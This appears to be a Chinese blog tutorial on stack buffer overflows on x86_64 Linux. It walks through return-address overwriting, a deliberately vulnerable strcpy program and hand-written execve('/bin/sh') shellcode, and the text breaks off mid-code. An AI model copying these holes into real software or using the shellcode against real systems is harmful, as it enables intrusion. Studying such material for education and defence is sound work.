<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mingliangliu.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言在现在的网络攻击中，缓冲区溢出方式的攻击占据了很大一部分，缓冲区溢出是一种非常普遍的漏洞，但同时，它也是非常危险的一种漏洞，轻则导致系统宕机，重则可导致攻击者获取系统权限，进而盗取数据，为所欲为。 其实缓冲区攻击说来也简单，请看下面一段代码： 1234void main(int argc, char *argv[]) &amp;#123;    char buffer[8];    if(argc &amp;">
<meta property="og:type" content="article">
<meta property="og:title" content="缓冲区溢出（栈溢出）">
<meta property="og:url" content="https://mingliangliu.com/2019/09/04/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%EF%BC%88%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%89/index.html">
<meta property="og:site_name" content="清欢&#39;s Blog">
<meta property="og:description" content="前言在现在的网络攻击中，缓冲区溢出方式的攻击占据了很大一部分，缓冲区溢出是一种非常普遍的漏洞，但同时，它也是非常危险的一种漏洞，轻则导致系统宕机，重则可导致攻击者获取系统权限，进而盗取数据，为所欲为。 其实缓冲区攻击说来也简单，请看下面一段代码： 1234void main(int argc, char *argv[]) &amp;#123;    char buffer[8];    if(argc &amp;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA1.jpg">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA2.jpg">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA3.jpg">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA4.jpg">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA7.jpg">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA5.jpg">
<meta property="og:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA6.jpg">
<meta property="article:published_time" content="2019-09-04T13:32:03.000Z">
<meta property="article:modified_time" content="2021-04-29T05:47:10.409Z">
<meta property="article:author" content="清欢">
<meta property="article:tag" content="Linux">
<meta property="article:tag" content="信息安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mingliangliu.com/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA1.jpg">

<link rel="canonical" href="https://mingliangliu.com/2019/09/04/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%EF%BC%88%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%89/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>缓冲区溢出（栈溢出） | 清欢's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">清欢's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">一个被遗忘的笔记本</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mingliangliu.com/2019/09/04/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA%EF%BC%88%E6%A0%88%E6%BA%A2%E5%87%BA%EF%BC%89/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="清欢">
      <meta itemprop="description" content="一个被遗忘的笔记本">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="清欢's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          缓冲区溢出（栈溢出）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2019-09-04 21:32:03" itemprop="dateCreated datePublished" datetime="2019-09-04T21:32:03+08:00">2019-09-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-04-29 13:47:10" itemprop="dateModified" datetime="2021-04-29T13:47:10+08:00">2021-04-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>在现在的网络攻击中，缓冲区溢出方式的攻击占据了很大一部分，缓冲区溢出是一种非常普遍的漏洞，但同时，它也是非常危险的一种漏洞，轻则导致系统宕机，重则可导致攻击者获取系统权限，进而盗取数据，为所欲为。</p>
<p>其实缓冲区攻击说来也简单，请看下面一段代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">8</span>];</span><br><span class="line">    <span class="keyword">if</span>(argc &gt; <span class="number">1</span>) <span class="built_in">strcpy</span>(buffer, argv[<span class="number">1</span>]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>当我们在对<code>argv[1]</code>进行拷贝操作时，并没对其长度进行检查，这时候攻击者便可以通过拷贝一个长度大于8的字符串来覆盖程序的返回地址，让程序转而去执行攻击代码，进而使得系统被攻击。</p>
<p>本篇主要讲述缓冲区溢出攻击的基本原理，我会从程序是如何利用栈这种数据结构来进行运行的开始，试着编写一个shellcode，然后用该shellcode来溢出我们的程序来进行说明。我们所要使用的系统环境为x86_64 Linux，我们还要用到gcc（v7.4.0）、gdb（v8.1.0）等工具，另外，我们还需要一点汇编语言的基础，并且我们使用AT&amp;T格式的汇编。</p>
<h2 id="进程"><a href="#进程" class="headerlink" title="进程"></a>进程</h2><p>在现代的操作系统中，进程是一个程序的运行实体，当在操作系统中运行一个程序时，操作系统会为我们的程序创建一个进程，并给我们的程序在内存中分配运行所需的空间，这些空间被称为进程空间。进程空间主要有三部分组成：代码段，数据段和栈段。如下图所示：</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA1.jpg" class="">

<h2 id="栈"><a href="#栈" class="headerlink" title="栈"></a>栈</h2><p>栈是一种后入先出的数据结构，在现代的大多数编程语言中，都使用栈这种数据结构来管理过程之间的调用。那什么又是过程之间的调用呢，说白了，一个函数或者一个方法便是一个过程，而在函数或方法内部调用另外的过程和方法便是过程间的调用。我们知道，程序的代码是被加载到内存中，然后一条条（这里指汇编）来执行的，而且时不时的需要调用其他的函数。当一个调用过程调用一个被调用过程时，所要执行的代码所在的内存地址是不同的，当被调用过程执行完后，又要回到调用过程继续执行。调用过程调用被调用过程时，需要使用<code>call</code>指令，并在<code>call</code>指令后指明要调用的地址，例如<code>call 地址</code>，当被调用过程返回时，使用<code>ret</code>指令来进行返回，但是并不需要指明返回的地址。那么程序是怎么知道我们要返回到什么地方呢？这主要是栈的功劳：执行<code>call</code>指令时，程序会自动的将<code>call</code>指令的下一条指令的地址加入到栈中，我们叫做返回地址。当程序返回时，程序从栈中取出返回地址，然后使程序跳转到返回地址处继续执行。</p>
<p>另外，程序在调用另一个过程时需要传递的参数，以及一个过程的局部变量（包括过程中开辟的缓冲区）都要分配在栈上。可见，栈是程序运行必不可少的一种机制。</p>
<p>但是，聪明的你可能一想：不对，既然程序的返回地址保存在栈上，过程的参数以及局部变量也保存在栈上，我们可以在程序中操纵参数和局部变量，那么我们是否也能操作返回地址，然后直接跳转到我们想要运行的代码处呢？答案当然是肯定的。</p>
<h2 id="改变程序的返回地址"><a href="#改变程序的返回地址" class="headerlink" title="改变程序的返回地址"></a>改变程序的返回地址</h2><p>我们看这也一个程序。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">example.c</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">func</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">long</span> *res;</span><br><span class="line">        res = &amp;res + <span class="number">2</span>;</span><br><span class="line">        *res += <span class="number">7</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">int</span> x = <span class="number">1</span>;</span><br><span class="line">        func();</span><br><span class="line">        x = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;%d\n&quot;</span>, x);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们在shell中使用如下命令编译运行一下，对于gcc编译时所用的参数，我先卖个关子。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ `gcc -fno-stack-protector example.c -o example`</span><br><span class="line">$ ./example</span><br></pre></td></tr></table></figure>

<p>你或许会说：“哎呀呀，不用看了，这么简单，运行结果是0嘛”。但结果真的是这样嘛。其实，这个程序的运行结果是1。“什么，这怎么可能是1嘛，不得了不得了”</p>
<p>还记的我们提到的我们可以在程序中改变过程的返回地址吗？在<code>func</code>中，看似是对res进行了一些无意义的操作，但是这实际上是改变了<code>func</code>的返回地址，跳过了<code>x = 0</code>这条赋值命令。让我们从汇编的层面上看一下这个程序是如何执行的。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ gdb gdb example</span><br><span class="line">GNU gdb (Ubuntu 8.1-0ubuntu3) 8.1.0.20180409-git</span><br><span class="line">Copyright (C) 2018 Free Software Foundation, Inc.</span><br><span class="line">...</span><br><span class="line">gdb-peda$ disassemble func </span><br><span class="line">Dump of assembler code <span class="keyword">for</span> <span class="keyword">function</span> func:</span><br><span class="line">   0x000000000000064a &lt;+0&gt;:	push   %rbp</span><br><span class="line">   0x000000000000064b &lt;+1&gt;:	mov    %rsp,%rbp</span><br><span class="line">   0x000000000000064e &lt;+4&gt;:	lea    -0x8(%rbp),%rax</span><br><span class="line">   0x0000000000000652 &lt;+8&gt;:	add    <span class="variable">$0x10</span>,%rax</span><br><span class="line">   0x0000000000000656 &lt;+12&gt;:	mov    %rax,-0x8(%rbp)</span><br><span class="line">   ...</span><br><span class="line">   0x000000000000066e &lt;+36&gt;:	retq   </span><br><span class="line">End of assembler dump.</span><br></pre></td></tr></table></figure>

<p>在gdb中，我们使用<code>disassemble func</code>来查看一下<code>func</code>函数的汇编代码，在这里，程序栈上的情况是这样的，其中栈的宽度为8字节：</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA2.jpg" class="">

<p>一看程序你也许会明白了，在4~12行（实际上这里的行应该是该条指令在该函数中第几个字节处，这里为了方便姑且就这样叫吧）程序取得<code>res</code>的地址,并将其地址加上0x10(即16)，这对应程序的<code>res = &amp;res + 2;</code>，此时<code>res</code>指向的便是返回地址所在的地址了，然后使用<code>*res += 7</code>来改变返回地址。至于为什么是加7而不是其他数，是因为我们的目的是跳过执行<code>x = 0</code>，而<code>x = 0</code>这条程序所占的字节数刚好为7个。我们使用<code>disassemble main</code>来查看一下<code>main</code>函数的汇编代码。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ disassemble main </span><br><span class="line">Dump of assembler code <span class="keyword">for</span> <span class="keyword">function</span> main:</span><br><span class="line">   0x000000000000066f &lt;+0&gt;:	push   %rbp</span><br><span class="line">   0x0000000000000670 &lt;+1&gt;:	mov    %rsp,%rbp</span><br><span class="line">   0x0000000000000673 &lt;+4&gt;:	sub    <span class="variable">$0x10</span>,%rsp</span><br><span class="line">   0x0000000000000677 &lt;+8&gt;:	movl   <span class="variable">$0x1</span>,-0x4(%rbp)</span><br><span class="line">   0x000000000000067e &lt;+15&gt;:	mov    <span class="variable">$0x0</span>,%eax</span><br><span class="line">   0x0000000000000683 &lt;+20&gt;:	callq  0x64a &lt;func&gt;</span><br><span class="line">   0x0000000000000688 &lt;+25&gt;:	movl   <span class="variable">$0x0</span>,-0x4(%rbp)</span><br><span class="line">   0x000000000000068f &lt;+32&gt;:	mov    -0x4(%rbp),%eax</span><br><span class="line">   ...   </span><br><span class="line">End of assembler dump.</span><br></pre></td></tr></table></figure>

<p>上面的汇编代码中，第25行便是<code>x = 0</code>这条程序的汇编指令，我们的目的是跳过它，也就是说我们要直接执行第32行处的代码，现在返回地址是指向第25行的（还记得前面说的返回地址是<code>call</code>指令下一条指令的地址吗），为了跳过它，我们给返回地址加7。</p>
<h2 id="覆盖返回地址"><a href="#覆盖返回地址" class="headerlink" title="覆盖返回地址"></a>覆盖返回地址</h2><p>现在，我们大概了解了如何修改返回地址让程序跳转到我们指定的地方执行，但是要攻击的程序可不是我们编写的啊，我们只是知道程序的某个地方有个缓冲区可以让我们往里面写数据，我们可没有办法改变程序的代码啊。这个时候，我们就要说一说关于缓冲区的拷贝这件事了。</p>
<p>还记的我们开头的程序吗？这里我们为了调试起来方便，我们给它加个输出。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">test.c</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>&#123;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">8</span>];</span><br><span class="line">    <span class="keyword">if</span>(argc &gt; <span class="number">1</span>) <span class="built_in">strcpy</span>(buffer, argv[<span class="number">1</span>]);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s\n&quot;</span>, buffer);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们的程序在栈上的结构大概是下面这个样子。这里将我们的栈换了个样子</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA3.jpg" class="">

<p>当程序对<code>argv[1]</code>进行拷贝操作时，依次将字符从低地址写向高地址。当<code>argv[1]</code>的长度小于8时，我们的缓冲区<code>buffer</code>空间足够，拷贝没有问题可以完成，但当我们的<code>argv[1]</code>的过长的话，长到将返回地址都覆盖了的话，<code>main</code>函数的返回地址就不知道返回到哪里去了。</p>
<p>让我们来试一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ gcc -fo-stack-protector  -o <span class="built_in">test</span> test.c</span><br><span class="line">$ ./<span class="built_in">test</span> hello</span><br><span class="line">hello</span><br><span class="line">$ ./<span class="built_in">test</span> helloworld</span><br><span class="line">helloworld</span><br><span class="line">$ ./<span class="built_in">test</span> helloworld123456789</span><br><span class="line">helloworld123456789</span><br><span class="line">Segmentation fault</span><br></pre></td></tr></table></figure>

<p>可以看到当我们给定的参数为<code>helloworld123456789</code>，我们的程序出现了段错误，也即是这时候，我们的返回地址被破环了，导致<code>main</code>函数返回时出错。这时候的栈看起来是下面这个样子的：</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA4.jpg" class="">

<p>对照前面的栈结构，发现<code>main</code>函数的返回地址的确被破坏了。若是我们往返回地址处覆盖一个我们想要执行的程序的地址，那是不是就可以执行我们的程序了呢？</p>
<h2 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h2><p>那么攻击时要执行什么程序呢？一般情况下，我们想通过缓冲区溢出来获取一个shell，一旦有了shell，我们就可以“为所欲为”了，因此我们也把这种程序叫做shellcode。那么这个shellcode在哪呢，可以确定的是，系统管理员是不会在系统中留一个shellcode的，也并不会告诉你：嘿，我这里有一个shellcode，地址是xxxx，你快把返回地址给覆盖了，来着里执行吧。所以，这个shellcode还需要我们自己编写，并传到要攻击的系统上。那要传递到哪呢？缓冲区不正是一个好地方嘛。</p>
<p>我们知道，在冯·诺伊曼架构的计算机中，数据和代码是不加以明确区分的，也就是说，内存中某个地方的东西，它既可以看作是一个程序的数据，也可以当作代码来执行。所以，我们大概有了一个攻击思路：我们将我们的shellcode放在缓冲区中，然后通过覆盖返回地址跳转到我们shellcode处，进而执行我们的shellcode</p>
<p>下面，我们来讨论如何编写一个shellcode</p>
<p>首先，我们为了得到一个shell，需要使用第59和60号系统调用，下面是他们的系统调用表，并以C语言的方式指明了他们的参数。</p>
<table>
<thead>
<tr>
<th align="center">%rax</th>
<th align="center">system call</th>
<th align="center">%rdi</th>
<th align="center">%rsi</th>
<th align="center">%rdx</th>
</tr>
</thead>
<tbody><tr>
<td align="center">59</td>
<td align="center">sys_execve</td>
<td align="center">const char *filename</td>
<td align="center">const char *const argv[]</td>
<td align="center">const char* const envp[]</td>
</tr>
<tr>
<td align="center">60</td>
<td align="center">sys_exit</td>
<td align="center">int error_code</td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>他们分别对应C语言中的系统函数<code>int execve(const char *filename, char *const argv[ ], char *const envp[ ]);</code>和<code>exit(int error_code)</code>，<code>execve()</code>用于在一个进程中启动新的程序，它的第一个参数是指程序所在的路径，第二个参数是传递给程序的参数，数组指针argv必须以程序filename开头，NULL结尾，最后一个参数为传递程序的新环境变量。而<code>exit()</code>的参数指明它的退出代码。</p>
<p>下面这个C语言程序便可以获取一个shell，当在获取的shell中输入<code>exit</code>时便可退出shell，且退出代码为0。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="keyword">char</span> *name[<span class="number">2</span>];</span><br><span class="line">    name[<span class="number">0</span>] = <span class="string">&quot;/bin/sh&quot;</span>;</span><br><span class="line">    name[<span class="number">1</span>] = <span class="literal">NULL</span>;</span><br><span class="line">    execve(name[<span class="number">0</span>], name, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>现在，让我们从汇编的角度思考一下，该如何编写一个和上面这个程序功能相似的shellcode。</p>
<ol>
<li>首先，我们需要一个字符串”/bin/sh”，并且需要知道它的确切地址</li>
<li>然后，我们需要将参数传递给相应的寄存器</li>
<li>最后，调用系统调用。</li>
</ol>
<p>如何方便的获取到一个字符串的地址呢？一种方法是将字符串放到一个<code>call</code>指令的后面，这样，当这个<code>call</code>指令执行的时候，该字符串的首地址便被加入到栈中。 好了，我不再绕弯子了，下面给出一个shellcode</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">jmp mycall</span><br><span class="line">func: pop %rbx</span><br><span class="line">mov %rbx, 0x8(%rsp)</span><br><span class="line">movb $0x0, 0x7(%rsp)</span><br><span class="line">movl $0x0, 0x10(%rsp)</span><br><span class="line">mov $59, %rax</span><br><span class="line">mov %rbx, %rdi</span><br><span class="line">lea 0x8(%rsp), %rsi</span><br><span class="line">lea 0x10(%rsp), %rdx</span><br><span class="line">syscall</span><br><span class="line">mov $60, %rax</span><br><span class="line">mov $0, %rdi</span><br><span class="line">syscall</span><br><span class="line">mycall: call func</span><br><span class="line">.string \&quot;&#x2F;bin&#x2F;sh\&quot;</span><br></pre></td></tr></table></figure>

<p>现在，我们依次看一下每一条指令的意思。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">1.  jmp mycall</span><br><span class="line"></span><br><span class="line">        当shellcode执行时，会先执行这一条，这会使我们的程序跳转到第14行的call指令处</span><br><span class="line"></span><br><span class="line">2.  func: pop %rbx</span><br><span class="line">        </span><br><span class="line">        我们从栈中获取返回地址，这也是字符串所在的地址</span><br><span class="line"></span><br><span class="line">3.  mov %rbx, 0x8(%rsp)</span><br><span class="line">4.  movb $0x0, 0x7(%rsp)</span><br><span class="line">5.  movl $0x0, 0x10(%rsp)</span><br><span class="line"></span><br><span class="line">        尽管我们有了字符串的地址，但是我们并没有第二个参数和第三个参数所在的地址，所以程序在栈上构造出第二个和第三个参数</span><br><span class="line"></span><br><span class="line">6.  mov $59, %rax</span><br><span class="line">7.  mov %rbx, %rdi</span><br><span class="line">8.  lea 0x8(%rsp), %rsi</span><br><span class="line">9.  lea 0x10(%rsp), %rdx</span><br><span class="line"></span><br><span class="line">        我们将参数传递给指定的寄存器</span><br><span class="line"></span><br><span class="line">10. syscall</span><br><span class="line"></span><br><span class="line">        使用syscall指令进行系统调用，这在x86 Linux中为int 0x80</span><br><span class="line"></span><br><span class="line">11. mov $60, %rax</span><br><span class="line">12. mov $0, %rdi</span><br><span class="line">13. syscall</span><br><span class="line"></span><br><span class="line">        为了使我们的shellcode在退出shell后正常退出，需要调用下exit系统调用，退出代码为0</span><br><span class="line"></span><br><span class="line">14. mycall: call func</span><br><span class="line"></span><br><span class="line">15. .string \&quot;&#x2F;bin&#x2F;sh\&quot;</span><br></pre></td></tr></table></figure>

<p>它们的执行流程如下图所示：</p>
<img src="/images/%E7%BC%93%E5%86%B2%E5%8C%BA%E6%BA%A2%E5%87%BA7.jpg" class="">

<p>现在，我们有了shellcode，我们先用C语言内联汇编的方式测试一下它是否能运行。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">shellcode_test.c</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__(</span><br><span class="line">        <span class="string">&quot;jmp mycall\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;func: pop %rbx\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov %rbx, 0x8(%rsp)\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;movb $0x0, 0x7(%rsp)\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;movl $0x0, 0x10(%rsp)\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov $59, %rax\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov %rbx, %rdi\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;lea 0x8(%rsp), %rsi\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;lea 0x10(%rsp), %rdx\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;syscall\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov $60, %rax\n\t&quot;</span></span><br><span class="line">        <span class="string">&quot;mov $0, 